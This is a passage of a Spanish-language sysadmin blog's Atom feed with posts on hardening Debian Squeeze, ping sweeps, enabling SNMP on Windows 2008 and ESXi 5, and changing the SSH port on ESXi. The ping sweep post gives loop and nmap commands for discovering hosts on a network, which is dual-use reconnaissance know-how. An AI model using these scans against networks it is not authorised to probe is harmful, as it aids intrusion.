/usr/bin/ssh-agent&lt;br /&gt;1777703  196 -rwsr-xr-x   1 root     root       194680 Dec 26 15:12 /usr/lib/openssh/ssh-keysign&lt;br /&gt;1737861   12 -rwsr-xr-x   1 root     root         9676 Jan 23 21:10 /usr/lib/pt_chown&lt;br /&gt;1433660   28 -rwxr-sr-x   1 root     shadow      27900 Oct 19  2010 /sbin/unix_chkpwd&lt;br /&gt;1433707   84 -rwsr-xr-x   1 root     root        80600 Aug 26  2010 /sbin/mount.nfs&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# chmod ug-s /usr/bin/wall /usr/bin/newgrp /usr/bin/chsh ............&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Permitir su - solo a los usuarios que pertenezcan al grupo wheel:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# addgroup --system wheel&lt;br /&gt;&lt;br /&gt;root@pdc:~# usermod -G wheel usuario_para_elevar_a_root&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/pam.d/su&lt;br /&gt; Descomentar:&lt;br /&gt;  auth       required   pam_wheel.so&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chequeo de seguridad:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# apt-get install tiger&lt;br /&gt;&lt;br /&gt;root@pdc:~# tiger&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Fuente:&lt;/span&gt; &lt;a href="http://www.arcert.gov.ar/ncursos/material/hardening-v2.pdf"&gt;http://www.arcert.gov.ar/ncursos/material/hardening-v2.pdf&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-2682142462288823013?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YPw3i0NWqbMRLvSMBVw4eCZQXyU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YPw3i0NWqbMRLvSMBVw4eCZQXyU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YPw3i0NWqbMRLvSMBVw4eCZQXyU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YPw3i0NWqbMRLvSMBVw4eCZQXyU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/rFaNYCMOXIE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/2682142462288823013/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=2682142462288823013" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2682142462288823013?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2682142462288823013?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/rFaNYCMOXIE/hardening-debian.html" title="Hardening Debian Squeeze" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-h14ArDWMWJ8/TtlkXS0GrZI/AAAAAAAAAeg/liO9R_-J1o4/s72-c/rcconf.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/hardening-debian.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0QFRHc7eCp7ImA9WhRTFk8.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-3713932744331411869</id><published>2011-11-06T13:58:00.000-08:00</published><updated>2011-11-06T15:15:15.900-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-06T15:15:15.900-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><category scheme="http://www.blogger.com/atom/ns#" term="Windows" /><title>Ping Sweep desde Linea de Comandos</title><content type="html">&lt;span style="font-weight:bold;"&gt;Tomando las ips de un determinado archivo (ips.txt):&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Users\Morsa\Desktop&gt; for /f %i in (ips.txt) do ping -n 1 %i&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Generando las ips desde la 1 a la 254 en el ultimo octeto:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Users\Morsa\Desktop&gt; for /L %i in (1,1,254) do ping 192.168.1.%i -n 1 &gt; result.txt&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;En bash:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;# for i in {1..255}; do ping 192.168.1.$i -c 1 ;done&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Con nmap:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Pingueo a un equipo:&lt;br /&gt;&lt;blockquote&gt;# nmap -sP 192.168.1.1&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Pingueo todo un rango de red:&lt;br /&gt;&lt;blockquote&gt;# namp -sP 192.168.1.0/24 &lt;br /&gt;# nmap -sP 192.168.1.0-254&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-3713932744331411869?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/X4Ml-Igt7f4WGL94lcGOnvMg_V4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/X4Ml-Igt7f4WGL94lcGOnvMg_V4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/X4Ml-Igt7f4WGL94lcGOnvMg_V4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/X4Ml-Igt7f4WGL94lcGOnvMg_V4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/LxqFbAsFsHE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/3713932744331411869/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=3713932744331411869" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3713932744331411869?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3713932744331411869?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/LxqFbAsFsHE/script-ping-sweep.html" title="Ping Sweep desde Linea de Comandos" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/11/script-ping-sweep.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUENRn8_fyp7ImA9WhRTFUQ.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-7161316103568520207</id><published>2011-11-06T08:04:00.000-08:00</published><updated>2011-11-06T08:41:37.147-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-06T08:41:37.147-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Monitoreo" /><category scheme="http://www.blogger.com/atom/ns#" term="Windows" /><title>SNMP windows 2008</title><content type="html">&lt;span style="font-weight:bold;"&gt;Inicio - Herramientas administrativas - Administrador del servidor&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-OQ1DJqG0bks/Traz91O1Y-I/AAAAAAAAAaM/GzgHOrQ5RAU/s1600/01.png"&gt;&lt;img style="margin: 0px auto 10px; width: 320px; height: 189px; text-align: center; display: block; cursor: pointer;" id="BLOGGER_PHOTO_ID_5671918655562408930" border="0" alt="" src="http://1.bp.blogspot.com/-OQ1DJqG0bks/Traz91O1Y-I/AAAAAAAAAaM/GzgHOrQ5RAU/s320/01.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Características - Agregar Característica&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-2x4zOW9YavE/Tra0VItXFEI/AAAAAAAAAbI/OzS4CLg-4ck/s1600/06.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://4.bp.blogspot.com/-2x4zOW9YavE/Tra0VItXFEI/AAAAAAAAAbI/OzS4CLg-4ck/s320/06.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5671919055927710786" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Servicios - Servicio SNMP - Siguiente&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-fz8-cIjRmhw/Tra0UphB4BI/AAAAAAAAAbA/QEH3oQgkkmA/s1600/05.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://4.bp.blogspot.com/-fz8-cIjRmhw/Tra0UphB4BI/AAAAAAAAAbA/QEH3oQgkkmA/s320/05.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5671919047554490386" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Instalar&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-xMq4jczJlDY/Tra0UKZoU0I/AAAAAAAAAaw/ChXI6TYldGg/s1600/04.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://1.bp.blogspot.com/-xMq4jczJlDY/Tra0UKZoU0I/AAAAAAAAAaw/ChXI6TYldGg/s320/04.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5671919039201956674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Cerrar&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-p43EjgmLJbg/Tra0TyoFWvI/AAAAAAAAAag/qJOI6wRbFKw/s1600/03.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://1.bp.blogspot.com/-p43EjgmLJbg/Tra0TyoFWvI/AAAAAAAAAag/qJOI6wRbFKw/s320/03.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5671919032820128498" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Reiniciamos el Servicio&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-plBq5YpbR6o/Tra0T7Fd96I/AAAAAAAAAaY/jgLhKHOIVgo/s1600/02.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://1.bp.blogspot.com/-plBq5YpbR6o/Tra0T7Fd96I/AAAAAAAAAaY/jgLhKHOIVgo/s320/02.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5671919035090859938" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-7161316103568520207?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4Q8kcpYDaFg5sSvqReL94X4y5f8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Q8kcpYDaFg5sSvqReL94X4y5f8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4Q8kcpYDaFg5sSvqReL94X4y5f8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Q8kcpYDaFg5sSvqReL94X4y5f8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/yfDQorD5i_s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/7161316103568520207/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=7161316103568520207" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/7161316103568520207?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/7161316103568520207?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/yfDQorD5i_s/snmp-windows-2008.html" title="SNMP windows 2008" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-OQ1DJqG0bks/Traz91O1Y-I/AAAAAAAAAaM/GzgHOrQ5RAU/s72-c/01.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/11/snmp-windows-2008.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEYDSHYzeyp7ImA9WhRTEkk.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-7666841712595238382</id><published>2011-11-01T15:31:00.000-07:00</published><updated>2011-11-02T06:56:19.883-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-02T06:56:19.883-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Monitoreo" /><category scheme="http://www.blogger.com/atom/ns#" term="Virtualización" /><title>Habilitar SNMP en ESXi 5</title><content type="html">Descargamos el &lt;span style="font-weight:bold;"&gt;VMware-vSphere-CLI-5.0.0-422456.exe&lt;/span&gt; de: &lt;a href="http://www.vmware.com/downloads/downloadBinary.do?downloadGroup=VCLI50&amp;vmware=downloadBinary&amp;file=VMware-vSphere-CLI-5.0.0-422456.exe&amp;pot=1&amp;code=VMware-vSphere-CLI-5.0.0-422456.exe&amp;hashKey=37cd2215fdb3fb20815a248ab3970d00&amp;tranId=68534068&amp;downloadURL="&gt;aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Para ver el menu de ayuda:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Program Files\VMware\VMware vSphere CLI\bin&gt;vicfg-snmp.pl --help&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Cambiamos la comunity:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C:\Program Files\VMware\VMware vSphere CLI\bin&gt;vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -c miComunidad&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Habilitar el agente:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Program Files\VMware\VMware vSphere CLI\bin&gt;vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -E&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Deshabilitar el agente:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Program Files\VMware\VMware vSphere CLI\bin&gt;vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -D&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora lo habilitamos en el Firewall mediante el vSphere, hacemos click en la solapa &lt;span style="font-weight:bold;"&gt;Configuration&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-BI9rPSfW6jk/TrFG22ImAuI/AAAAAAAAAXw/twdNQ9ZKKZI/s1600/01.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 120px;" src="http://1.bp.blogspot.com/-BI9rPSfW6jk/TrFG22ImAuI/AAAAAAAAAXw/twdNQ9ZKKZI/s320/01.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5670391313894605538" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Luego en &lt;span style="font-weight:bold;"&gt;Security Profile&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-GOhFa2Y29nA/TrFIi2QGRmI/AAAAAAAAAYg/W5xbOeyGC3c/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 303px;" src="http://1.bp.blogspot.com/-GOhFa2Y29nA/TrFIi2QGRmI/AAAAAAAAAYg/W5xbOeyGC3c/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5670393169351951970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En la sección de &lt;span style="font-weight:bold;"&gt;Firewall &lt;/span&gt;hacemos click sobre &lt;span style="font-weight:bold;"&gt;Properties&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-VOtChy1qj_w/TrFHg0YyZKI/AAAAAAAAAYE/F-A42kJ2nVM/s1600/03.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 42px;" src="http://1.bp.blogspot.com/-VOtChy1qj_w/TrFHg0YyZKI/AAAAAAAAAYE/F-A42kJ2nVM/s320/03.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5670392034980160674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Seleccionamos en la lista &lt;span style="font-weight:bold;"&gt;dynamicruleset &lt;/span&gt;y luego clickeamos en el botón &lt;span style="font-weight:bold;"&gt;Firewall&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-JDdRgqAONLU/TrFJMEPts1I/AAAAAAAAAYs/5EtVLHkWal8/s1600/04.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 317px;" src="http://1.bp.blogspot.com/-JDdRgqAONLU/TrFJMEPts1I/AAAAAAAAAYs/5EtVLHkWal8/s320/04.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5670393877483074386" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Elegimos la ip/ips ó redes desde donde permitiremos las consultas SNMP y luego damos &lt;span style="font-weight:bold;"&gt;Ok &lt;/span&gt;en las ventanas restantes.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-rVm4NBUL9ik/TrFK7ja-irI/AAAAAAAAAY4/AMOHgqhy_mM/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 172px;" src="http://4.bp.blogspot.com/-rVm4NBUL9ik/TrFK7ja-irI/AAAAAAAAAY4/AMOHgqhy_mM/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5670395792817294002" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-7666841712595238382?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5IWVziPrn6eGgmaLweNr4LBkdI0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5IWVziPrn6eGgmaLweNr4LBkdI0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5IWVziPrn6eGgmaLweNr4LBkdI0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5IWVziPrn6eGgmaLweNr4LBkdI0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/OubM-DPAeQ0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/7666841712595238382/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=7666841712595238382" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/7666841712595238382?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/7666841712595238382?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/OubM-DPAeQ0/snmp-en-esxi-5.html" title="Habilitar SNMP en ESXi 5" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-BI9rPSfW6jk/TrFG22ImAuI/AAAAAAAAAXw/twdNQ9ZKKZI/s72-c/01.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/11/snmp-en-esxi-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcFR3c5fyp7ImA9WhdaGEg.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-2735168475971653204</id><published>2011-10-28T19:46:00.000-07:00</published><updated>2011-10-28T20:13:36.927-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-28T20:13:36.927-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Virtualización" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad" /><title>Cambiar Port SSH en ESXi 5</title><content type="html">&lt;span style="font-weight:bold;"&gt;Editamos el archivo y cambiamos el port por defecto (22) por el que deseamos, en mi caso por el 3333:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt; # vi /etc/ssh/sshd_config&lt;br /&gt;  Port 3333&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reiniciamos los agentes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt; # services.sh restart&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Configuramos el firewall:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt; # vi /vmfs/volumes/datastore&lt;br /&gt;  &amp;#60;ConfigRoot&gt;&lt;br /&gt;  &amp;#60;service id='0000'&gt;&lt;br /&gt;  &amp;#60;id&gt;sshMorsa&amp;#60;/id&gt;&lt;br /&gt;  &amp;#60;rule id='0000'&gt;&lt;br /&gt;  &amp;#60;direction&gt;inbound&amp;#60;/direction&gt;&lt;br /&gt;  &amp;#60;protocol&gt;tcp&amp;#60;/protocol&gt;&lt;br /&gt;  &amp;#60;dst&amp;#60; /porttype&gt;&lt;br /&gt;  &amp;#60;port&gt;3333&amp;#60;/port&gt;&lt;br /&gt;  &amp;#60;/rule&gt;&lt;br /&gt;  &amp;#60;enabled&gt;true&amp;#60;/enabled&gt;&lt;br /&gt;  &amp;#60;required&gt;false&amp;#60;/required&gt;&lt;br /&gt;  &amp;#60;/service&gt;&lt;br /&gt;  &amp;#60;/ConfigRoot&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos el script para después del booteo editando el /etc/rc.local y agregamos las siguientes líneas:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt; # vi /etc/rc.local&lt;br /&gt;  #Creamos el script:&lt;br /&gt;  cp /vmfs/volumes/datastore/sshMorsa.xml /etc/vmware/firewall&lt;br /&gt;&lt;br /&gt;  # Actualizamos las reglas del firewall:&lt;br /&gt;  /sbin/esxcli network firewall refresh&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Verificamos el vSphere Client:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-e9vZnY1_oOg/TqtpgR_dIbI/AAAAAAAAAXg/bVJb2YPH3R0/s1600/ESXi.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 94px;" src="http://4.bp.blogspot.com/-e9vZnY1_oOg/TqtpgR_dIbI/AAAAAAAAAXg/bVJb2YPH3R0/s320/ESXi.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5668740559282184626" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;FUENTES:&lt;/span&gt;&lt;br /&gt; &lt;a href="http://www.no-x.org/"&gt;http://www.no-x.org/&lt;/a&gt;&lt;br /&gt; &lt;a href="http://communities.vmware.com"&gt;http://communities.vmware.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-2735168475971653204?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/kieykbtG40_qFwxKU7dvezRfrc8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kieykbtG40_qFwxKU7dvezRfrc8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/kieykbtG40_qFwxKU7dvezRfrc8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kieykbtG40_qFwxKU7dvezRfrc8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/cwWMz9WFSnY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/2735168475971653204/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=2735168475971653204" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2735168475971653204?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2735168475971653204?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/cwWMz9WFSnY/cambiar-port-ssh-en-esxi-5.html" title="Cambiar Port SSH en ESXi 5" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 